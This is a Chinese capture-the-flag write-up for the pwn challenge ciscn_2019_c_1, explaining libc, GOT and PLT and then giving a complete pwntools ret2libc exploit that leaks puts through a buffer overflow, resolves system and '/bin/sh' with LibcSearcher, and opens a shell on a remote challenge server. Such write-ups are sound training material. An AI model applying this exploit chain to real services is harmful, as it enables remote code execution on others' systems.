当前位置: 首页 > web >正文

ciscn_2019_c_1

web 2025/5/6 6:55:23

前提知识点:

libc和got,plt表

网上解释很多
我就讲一下我粗俗的理解

我们在编写代码利用了很多库函数,这个库函数藏在libc里面(编译链接的知识)

然后对于程序运行,比如我们在libc里面引用了puts函数

程序先去看plt表,plt粗俗理解就是 call puts。第一次plt表里面需要先去寻找got表,got表里面就是编译链接的时候存储的libc的函数地址信息什么的

真实地址=libc基地址+offset(偏移)
每个libc版本,有不同的

ai给的解释

好的!我来用最通俗的方式解释一下 libc、GOT、PLT 是什么,以及它们之间的关系。假设你写了一个程序,里面用了 printf 这个函数(比如 printf("Hello World");),但你的程序本身并没有实现 printf,而是调用了操作系统提供的库函数。这时候,libcGOTPLT 就派上用场了。

1. libc 是什么?

  • libc 就是操作系统提供的一个“工具箱”,里面装满了各种常用函数(比如 printfmallocsystem 等)。
  • 你可以把 libc 想象成一个图书馆,里面有很多“书”(函数),你的程序需要的时候就去图书馆借书用。
  • 举个例子:你想用 printf,但你的程序本身不包含这个函数的代码,而是从 libc 里“借”来的。libc 里的函数地址是固定的(比如某个偏移量),但程序运行时,这些地址会被随机化(ASLR机制),所以需要动态查找。

2. GOT 和 PLT 是什么?

假设你的程序要调用 printf,但 printf 的真实地址在运行时才确定(因为 ASLR 随机化了地址)。这时候,PLTGOT 就成了你的“导航地图”。

PLT(Procedure Linkage Table)
  • PLT 就是一张“跳转表”,每个函数调用(比如 printf)在 PLT 中都有一个对应的“跳板”。
  • 第一次调用函数时:PLT 会跳转到 GOT 表,看看有没有这个函数的地址。如果 GOT 表里没有,PLT 会触发动态链接器去查找 libc 中的真实地址,并更新 GOT 表。
  • 之后调用函数时:PLT 直接从 GOT 表中读取地址,直接跳转到真实函数,不再需要查找。
GOT(Global Offset Table)
  • GOT 是一个“全局地址表”,存储了所有外部函数(比如 printf)的真实地址。
  • 作用:当程序运行时,GOT 表会记录每个函数的地址。比如,printf 的真实地址会被写入 GOT 表的某个位置。
  • 为什么需要 GOT? 因为程序运行时,libc 的地址是随机的(ASLR),所以需要一个地方存储这些动态查找后的地址。

3. 粗俗类比

想象你去图书馆借书(调用 printf):

  1. PLT 是图书馆的“借书指南”,上面写着:“要借《printf》这本书,先去问管理员(GOT)。”
  2. GOT 是管理员的“书架清单”,管理员说:“《printf》这本书的地址是 0x12345678。”
  3. libc 是图书馆里实际存放书的地方,地址 0x12345678 对应的就是 printf 函数的代码。

4. 动态链接的流程

  1. 第一次调用 printf
    • 程序看到 printf 被调用了,跳转到 printf@PLT
    • printf@PLT 会检查 printf@GOT(GOT 表中的 printf 地址)。
    • 如果 printf@GOT 是空的(未解析),PLT 会触发动态链接器去 libc 中查找 printf 的真实地址,并更新 printf@GOT
  2. 之后调用 printf
    • 程序直接从 printf@GOT 中读取地址,跳转到真实函数,不需要再查找。

5. 真实地址的计算

  • 真实地址 = libc 基地址 + 偏移量
    • libc 基地址:程序运行时,libc 被加载到内存中的起始地址(因为 ASLR,每次运行都会不同)。
    • 偏移量printf 在 libc 中的固定偏移(比如 printf 的偏移是 0x00060710)。
    • 真实地址libc 基地址 + 0x00060710

6. 总结

  • libc:提供所有常用函数的“图书馆”。
  • GOT:记录函数真实地址的“管理员清单”。
  • PLT:帮助程序调用函数的“跳板”,第一次调用时找 GOT,之后直接用 GOT 中的地址。

关键点

  • 程序调用 printf 时,不会直接去 libc 找地址,而是通过 PLT 和 GOT 的配合,按需加载并缓存地址。
  • 这种机制叫 延迟绑定(Lazy Binding),节省内存和时间,只在需要时才查找函数地址。

  • 1. 什么是 libc 的偏移量?

  • 偏移量(offset) 是指某个函数在 libc 库中的固定位置(相对于 libc 的起始地址)。
    • 例如:system 函数在某个 libc 版本中的偏移可能是 0x45390puts 的偏移可能是 0x7f000
  • 这些偏移量在 同一版本的 libc 中是固定的,但不同版本的 libc 可能会有不同的偏移。

实操

运行一下

去找找漏洞点

get漏洞

溢出0x50

我们去找到pop rdi 和retn的地址

利用puts函数,利用puts去打libc

 第一段exp

from pwn import *
from LibcSearcher import *elfpath = 'ciscn_2019_c_1'
# io = process(elfpath)
io = remote("node5.buuoj.cn", 26175)
elf = ELF(elfpath)context(arch=elf.arch, os=elf.os, log_level="debug")rdi_ret_addr = 0x400c83
ret_addr = 0x4006b9
main_addr = 0x400B28
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']# 第一次发送:加密选项
io.recvuntil(b'Input your choice!\n')  # 确保接收到菜单提示符
io.sendline(b'1')  # 选择加密选项
# 构造 payload 泄露 puts 地址
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter(b'encrypted\n', payload)

解释:

首先

这里有strlen,我们直接输入\0,那么跳过了那些所谓的加密啥的

然后就是溢出

p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

讲putsgot表作为参数,打印出来

然后再回到main函数,下一段exp

确定libc版本


# 接收菜单多余输出
io.recvline()  # 接收 "2.Decrypt\n"
io.recvline()  # 接收 "3.Exit\n"# 接收 puts 地址
puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
print(hex(puts_addr))# 计算 libc 基址
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')

因为我们又运行了main函数,所以他还会有两个\n,我们过滤一下

下面计算libc得到backdoor的函数,就是一套一套的,没啥可讲

然后就是第二段exp

第二段exp

# 第二次发送:调用 system("/bin/sh")
io.recvuntil(b'Input your choice!\n')  # 确保接收到菜单提示符
io.sendline(b'1')  # 选择加密选项
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(ret_addr) + p64(rdi_ret_addr) + p64(binsh) + p64(system)
io.sendlineafter(b'encrypted\n', payload)

一样的,再次利用,然后执行system

总exp

from pwn import *
from LibcSearcher import *elfpath = 'ciscn_2019_c_1'
# io = process(elfpath)
io = remote("node5.buuoj.cn", 26175)
elf = ELF(elfpath)context(arch=elf.arch, os=elf.os, log_level="debug")rdi_ret_addr = 0x400c83
ret_addr = 0x4006b9
main_addr = 0x400B28
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']# 第一次发送:加密选项
io.recvuntil(b'Input your choice!\n')  # 确保接收到菜单提示符
io.sendline(b'1')  # 选择加密选项
# 构造 payload 泄露 puts 地址
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(rdi_ret_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter(b'encrypted\n', payload)# 接收菜单多余输出
io.recvline()  # 接收 "2.Decrypt\n"
io.recvline()  # 接收 "3.Exit\n"# 接收 puts 地址
puts_addr = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\0'))
print(hex(puts_addr))# 计算 libc 基址
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')# 第二次发送:调用 system("/bin/sh")
io.recvuntil(b'Input your choice!\n')  # 确保接收到菜单提示符
io.sendline(b'1')  # 选择加密选项
payload = b'\0' + b'a' * (0x50 - 1 + 8) + p64(ret_addr) + p64(rdi_ret_addr) + p64(binsh) + p64(system)
io.sendlineafter(b'encrypted\n', payload)# 进入交互模式
io.interactive()

http://www.xdnf.cn/news/4019.html

相关文章:

  • 普联的AC100+AP+易展路由组网方案的一些问题
  • docker介绍以及安装
  • sherpa-ncnn:Linux_x86交叉编译Linux_arm32上的sherpa-ncnn -- 语音转文本大模型
  • 蓝桥杯单片机备战笔记
  • 【中间件】brpc_基础_TimerThread
  • 五一假期作业
  • springboot单体项目的执行流程
  • LFU算法解析
  • 【PostgreSQL数据分析实战:从数据清洗到可视化全流程】4.5 清洗流程自动化(存储过程/定时任务)
  • 【中间件】brpc_基础_单例
  • FreeRTOS学习系列·二值信号量
  • Linux查询日志常用命令
  • 解锁现代健康密码:科学养生新主张
  • 基于PLC的换热器温度控制系统设计
  • 状态模式(State Pattern)
  • 电子商务商家后台运营专员模板
  • C++ 中二级指针的正确释放方法
  • 【KWDB 创作者计划】_Ubuntu 22.04系统KWDB数据库安装部署使用教程
  • Qt中的UIC
  • Amazon Bedrock Converse API:开启对话式AI新体验
  • Qt开发:容器组控件的介绍和使用
  • 20、数据可视化:魔镜报表——React 19 图表集成
  • 408考研逐题详解:2009年第8题
  • Java后端程序员学习前端之CSS
  • Python matplotlib 成功使用SimHei 中文字体
  • 详解RabbitMQ工作模式之发布订阅模式
  • 基于C++实现的深度学习(cnn/svm)分类器Demo
  • Baklib知识中台:智能服务架构新实践
  • 【算法学习】递归、搜索与回溯算法(一)
  • python函数复习(形参实参,收集参数,关键字参数)